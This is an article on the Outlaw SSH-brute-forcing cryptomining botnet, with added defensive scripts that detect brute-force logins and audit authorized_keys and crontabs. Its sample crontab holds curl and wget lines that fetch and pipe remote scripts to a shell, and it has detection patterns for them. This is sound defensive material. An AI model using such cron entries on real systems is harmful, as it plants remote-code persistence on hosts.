Cybersecurity researchers have shed light on an “auto-propagating” cryptocurrency mining botnet called Outlaw (aka Dota) that is known for targeting SSH servers with weak credentials.
“Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems,” Elastic Security Labs said in a new analysis published Tuesday.
Outlaw is also the name given to the threat actors behind the malware. It is believed to be of Romanian origin. Other hacking groups dominating the cryptojacking landscape include 8220, Keksec (aka Kek Security), Kinsing, and TeamTNT.
Active since at least late 2018, the hacking crew has brute-forced SSH servers, abusing the foothold to conduct reconnaissance and maintain persistence on the compromised hosts by adding their own SSH keys to the “authorized_keys” file.
The attackers are also known to incorporate a multi-stage infection process that involves using a dropper shell script (“tddwrt7s.sh”) to download an archive file (“dota3.tar.gz”), which is then unpacked to launch the miner while also taking steps to remove traces of past compromises and kill both the competition and their own previous miners.
A notable feature of the malware is an initial access component (aka BLITZ) that allows for self-propagation of the malware in a botnet-like fashion by scanning for vulnerable systems running an SSH service. The brute-force module is configured to fetch a target list from an SSH command-and-control (C2) server to further perpetuate the cycle.
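The initial-access pattern described above (a burst of failed SSH logins from one source, then a success) is exactly what a weak-credential worm leaves in sshd logs. The following detection logic is an added example written for this article; it is not Elastic's code or any Outlaw component. The log lines are constructed samples using documentation IP ranges, and the threshold and window values are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines (not from the article). Source addresses come from
# documentation ranges (203.0.113.0/24, 198.51.100.0/24), so no real host is referenced.
SAMPLE_LOG = """\
Apr  1 10:00:01 web1 sshd[1201]: Failed password for root from 203.0.113.5 port 40001 ssh2
Apr  1 10:00:02 web1 sshd[1202]: Failed password for invalid user admin from 203.0.113.5 port 40002 ssh2
Apr  1 10:00:03 web1 sshd[1203]: Failed password for root from 203.0.113.5 port 40003 ssh2
Apr  1 10:00:04 web1 sshd[1204]: Failed password for invalid user oracle from 203.0.113.5 port 40004 ssh2
Apr  1 10:00:05 web1 sshd[1205]: Failed password for root from 203.0.113.5 port 40005 ssh2
Apr  1 10:00:06 web1 sshd[1206]: Accepted password for root from 203.0.113.5 port 40006 ssh2
Apr  1 10:03:00 web1 sshd[1300]: Failed password for alice from 198.51.100.7 port 50001 ssh2
Apr  1 10:03:20 web1 sshd[1301]: Accepted publickey for alice from 198.51.100.7 port 50002 ssh2
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines sshd writes.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2025):
    """Return a dict for an auth-result line, or None for anything else.
    Syslog timestamps carry no year, so the caller supplies one (assumed 2025 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources that reach `threshold` failures inside `window_seconds`
    (noisy_sources) and, more urgently, sources that then log in successfully
    right after such a burst (likely_compromises)."""
    failures = defaultdict(list)      # ip -> timestamps of recent failed logins
    noisy, compromises = set(), []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        # Drop failures that have aged out of the sliding window for this source.
        failures[ip] = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
        if ev["result"] == "Failed":
            failures[ip].append(ts)
            if len(failures[ip]) >= threshold:
                noisy.add(ip)
        elif len(failures[ip]) >= threshold:
            compromises.append({"ip": ip, "user": ev["user"], "method": ev["method"],
                                "failures_before_success": len(failures[ip]), "at": ts})
    return {"noisy_sources": sorted(noisy), "likely_compromises": compromises}


if __name__ == "__main__":
    report = detect_bruteforce(SAMPLE_LOG)
    for hit in report["likely_compromises"]:
        print(f"{hit['at']} {hit['ip']} -> {hit['user']} via {hit['method']} "
              f"after {hit['failures_before_success']} failures")
```

A success following a burst is ranked above the burst itself because a blocked brute-force source is noise, while a password login that lands right after one is the moment a host joins the botnet; in practice that alert should trigger a check of the account's `authorized_keys` and crontab.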
Some iterations of the attacks have also resorted to exploiting Linux- and Unix-based operating systems susceptible to CVE-2016-8655 and CVE-2016-5195 (aka Dirty COW), as well as attacking systems with weak Telnet credentials. Upon gaining initial access, the malware deploys SHELLBOT for remote control via a C2 server using an IRC channel.
SHELLBOT, for its part, allows the execution of arbitrary shell commands, downloads and runs additional payloads, launches DDoS attacks, steals credentials, and exfiltrates sensitive information.
As part of its mining process, it determines the CPU of the infected system and enables hugepages for all CPU cores to improve memory access efficiency. The malware also uses a binary called kswap01 to ensure persistent communications with the threat actor’s infrastructure.
“Outlaw remains active despite using basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence,” Elastic said. “The malware deploys modified XMRig miners, leverages IRC for C2, and includes publicly available scripts for persistence and defense evasion.”
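The two persistence mechanisms named in this article, SSH key manipulation of `authorized_keys` and cron-based persistence, can both be audited from the file contents alone. The script below is an added example for this article, not Elastic's tooling or anything from the Outlaw kit. The `authorized_keys` and crontab contents are constructed samples (the key blobs are placeholder base64, not real public keys), the approved-key inventory is assumed to hold only one key, and the crontab patterns are generic heuristics chosen here rather than indicators from the report.

```python
import base64
import hashlib
import re

# Constructed sample ~/.ssh/authorized_keys (not from the article). The base64 blobs are
# placeholders, not real public keys; the audit only hashes their decoded bytes.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyPlaceholder0 alice@laptop
# comments and blank lines are ignored

no-pty,command="/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQRestrictedPlaceholder0 backup@host
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQUnknownPlaceholder noname
"""

# Constructed sample user crontab (not from the article); 203.0.113.9 is a documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
@reboot /var/tmp/.cache/run.sh
*/5 * * * * curl -fsSL http://203.0.113.9/s.sh | sh
*/10 * * * * /usr/bin/wget -q -O - http://203.0.113.9/p | bash
"""

# An authorized_keys entry is "[options] keytype base64blob [comment]".
KEY_RE = re.compile(
    r"(?:^|\s)(?P<type>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+(?P<blob>\S+)"
    r"(?:\s+(?P<comment>.*))?$"
)


def ssh_fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (padding stripped)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# In practice this set comes from the key inventory; here only alice's key is approved (assumption).
APPROVED_FINGERPRINTS = {ssh_fingerprint("AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyPlaceholder0")}


def audit_authorized_keys(text, approved=APPROVED_FINGERPRINTS):
    """One finding per key line that is outside the inventory, malformed, or carries a forced command."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m is None:
            findings.append({"line": lineno, "fingerprint": None, "comment": "",
                             "reasons": ["unparseable entry"]})
            continue
        options = line[:m.start()].strip()      # everything before the key type
        reasons, fp = [], None
        try:
            fp = ssh_fingerprint(m["blob"])
        except ValueError:                      # binascii.Error is a ValueError
            reasons.append("malformed key blob")
        if fp is not None and fp not in approved:
            reasons.append("key not in approved inventory")
        if "command=" in options:
            reasons.append("forced command in options")
        if reasons:
            findings.append({"line": lineno, "fingerprint": fp,
                             "comment": m["comment"] or "", "reasons": reasons})
    return findings


# Generic cron persistence heuristics (chosen for this example, not indicators from the report).
CRON_RULES = [
    ("downloads and pipes to a shell",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash|dash)\b")),
    ("hidden path under a world-writable directory",
     re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/\.")),
    ("runs from a world-writable directory at boot",
     re.compile(r"^@reboot\s+(?:/tmp|/var/tmp|/dev/shm)/")),
]


def audit_crontab(text):
    """One finding per crontab entry that matches any persistence heuristic."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [name for name, rx in CRON_RULES if rx.search(line)]
        if reasons:
            findings.append({"line": lineno, "entry": line, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"authorized_keys line {f['line']} ({f['comment']}): {', '.join(f['reasons'])}")
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']}: {', '.join(f['reasons'])}")
```

Keying the allowlist on fingerprints rather than comments matters because the comment field is free text an attacker can set to anything; a forced `command=` option is flagged for review rather than treated as malicious on its own, since it is also how legitimate backup and deploy keys are restricted. Run the same audit over every user's `authorized_keys` and both user and system crontabs, and diff the findings against the previous run so that newly appearing entries stand out.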